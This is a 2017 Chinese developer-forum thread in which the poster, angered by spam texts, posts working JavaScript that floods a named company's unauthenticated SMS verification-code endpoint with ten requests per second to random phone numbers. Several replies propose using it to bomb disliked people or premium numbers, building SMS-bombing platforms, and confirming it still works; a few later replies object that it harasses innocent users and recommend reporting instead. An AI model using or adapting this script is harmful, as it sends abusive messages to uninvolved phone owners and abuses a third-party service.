我也不知道该怎么屏蔽这种破短信了。要不把 10690666 前缀的都屏蔽掉算了。
信息里面的网址 :CcOgjKR/nc.t (为避免大家点进去,进行了 reverse,真要点的话,自己 reverse 一下: 'CcOgjKR/nc.t'.split('').reverse().join(''))
这骚扰短信真坑爹。我就试试点进去看看怎么骗人吧。第一个页面就是填手机号收验证码的。
看了下,短信接口随意跨域+不验证就发短信。爆破平台又多了一个接口。
写了个随机刷接口的 js 版本。有 jquery 就黏贴进去就行(例如测网速专用的首页,还有测网速不上 bd 上 jd 的那个网站),写了一秒钟同时十条。
(然并卵的目的:用光他的短信钱。)
真想把这个挂载一些大流量的平台上面。刷爆他的短信。
为避免误杀,我选择随机 17* 的号码段进行了。
如果你的号码被不幸刚好被随机了,那真幸运,先说一句对不起。
setInterval(() => {
const random = parseInt(Math.random() * 1000000000);
for(let i = 10; i--;) {
$.post('https://chaoshi-api.jujinpan.cn/0.2/tool/send-verify-code', {
mobile: 17000000000 + random + i,
msg: '辣鸡广告,刷爆你的短信',
});
}
}, 1000);
1
SingeeKing 2017-07-31 11:48:18 +08:00
我选择使用
'CcOgjKR/nc.t'[::-1] |
2
clearbug 2017-07-31 12:02:59 +08:00 via Android
还能用不?等下回去轰炸下自己讨厌的人
|
3
fangpeishi 2017-07-31 12:14:59 +08:00 4
如果用这个轰炸一下一些靓号,那些大佬很快就会去投诉,然后短信通道就会被关了的。
13888888888 13866666666 13555555555 。。。。 |
4
anheiyouxia 2017-07-31 12:21:19 +08:00 via Android
@clearbug 同一个号码最多发 6 条
|
6
shenqi OP @fangpeishi 好思路。
|
7
shenqi OP @SingeeKing 看不懂这是哪门语言的。
|
8
doublleft 2017-07-31 12:31:14 +08:00
思路奇特。
你不去举报垃圾短息,却跟人家验证码发送平台过意不去,而且还乱发短信。 |
10
anheiyouxia 2017-07-31 12:41:35 +08:00 via Android
@shenqi 千万不要去 12321 举报,举报多了会有很多平台的验证码都收不到
|
11
SingeeKing 2017-07-31 12:53:58 +08:00
@shenqi Python
|
13
tabris17 2017-07-31 13:38:20 +08:00
可以投诉这个短信网关,ISP 会关掉的
|
14
shenqi OP |
15
clearbug 2017-07-31 15:00:08 +08:00
奇怪,msg 可以请求中自己定义?
|
17
TigerK 2017-07-31 15:17:40 +08:00
举报到 12321,运营商就会屏蔽这个端口向你的手机发送短信了,收到垃圾邮件也可以到上面举报,让运营商直接把发信 IP 拉黑。嘻嘻~
|
18
vipper 2017-07-31 15:30:11 +08:00
通讯录白名单,可以拒绝掉这类短信
|
19
ma125125t 2017-07-31 17:57:51 +08:00
{
"msg": "手机号码格式不正确", "code": 10001, "data": { "msg": "手机号码格式不正确", "code": 10001 }, "res": 0 } |
20
zhanghk668 2017-07-31 19:07:04 +08:00
抓一批这种发短信的地址.做一个循环遍历批量发包.2333
|
21
falcon05 2017-07-31 19:09:27 +08:00 via iPhone
你不是帮它推广了吗
|
22
shenqi OP |
23
shenqi OP @zhanghk668 那样就能自己做短信爆破平台了。
|
24
zhangneww 2017-08-01 10:06:44 +08:00
楼主这思路很是清奇啊,自己被轰炸了,然后去轰炸别人? 170 号段果然低人一等。
|
25
dacainiaoxe 2017-08-01 14:31:05 +08:00
@fangpeishi 老哥,没找到怎么点赞的方式,给你 10 个铜币,思路真的牛逼啊 哈哈哈哈哈
|
26
KgM4gLtF0shViDH3 2017-08-03 10:00:15 +08:00
为什么都是手机号码格式不正确
|
27
lynnX 2017-08-03 16:28:50 +08:00
BUG 还没修复 用自己的号码试了下 成功收到了验证短信
|
29
KgM4gLtF0shViDH3 2017-08-04 11:47:50 +08:00
@timothyye #28 OK 了,这两天项目都用 json 传的。。。先跑个 1000 条。
|
31
danieldong 2017-08-07 15:34:29 +08:00
没看懂呢,是说用这个就可以给随意讨厌的人疯狂发短信吗?
|
32
dexin 2017-08-09 15:46:22 +08:00
短信轰炸、短信炸弹,是指通过恶意程序,利用从各个网站上找到的动态短 URL (比如验证码发送的 URL)和 前端输入的被攻击者手机号码,发送 HTTP 请求,每次请求给用户发送一个动态的短信(比如验证码短信)。 最终的效果,就是朝许多无关的手机用户,发送很多验证码短信。导致手机用户被骚扰。
so,你的做法就是自己被骚扰了,通过报复的方式刷光发短信的公司短信额度,后果就是数以万计的无辜号码被骚扰 PS:现在稍微有些流量的网站都有做图形验证来防护这种恶意调用,所以你的想法不太容易实现 正解就是投诉或者直接手机拉黑此号码,前者被动以后估计都收不到验证码短信了,或者主动,起码手机拦截里面可以看到验证码短信,当然苹果手机的话就另算了 |